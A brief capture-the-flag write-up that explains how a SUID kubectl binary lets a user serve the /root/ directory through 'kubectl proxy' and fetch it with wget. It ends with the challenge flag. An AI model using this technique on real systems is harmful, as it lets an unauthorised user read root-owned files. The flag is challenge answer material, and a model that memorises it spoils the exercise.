punkctf/gtfobins_02.md


1
2
3
4
5
6
7
8

through basic recon you can find kubectl has suid bit

if you lookup on gtfobins you find you can serve static files with kubectl using `kubectl proxy --address=0.0.0.0 --port=4444 --www=/root/ --www-prefix=/x/`

then just `wget http://localhost:4444/x/` in another tab

`punk_{FUN9BUQ19K8VCDRT}`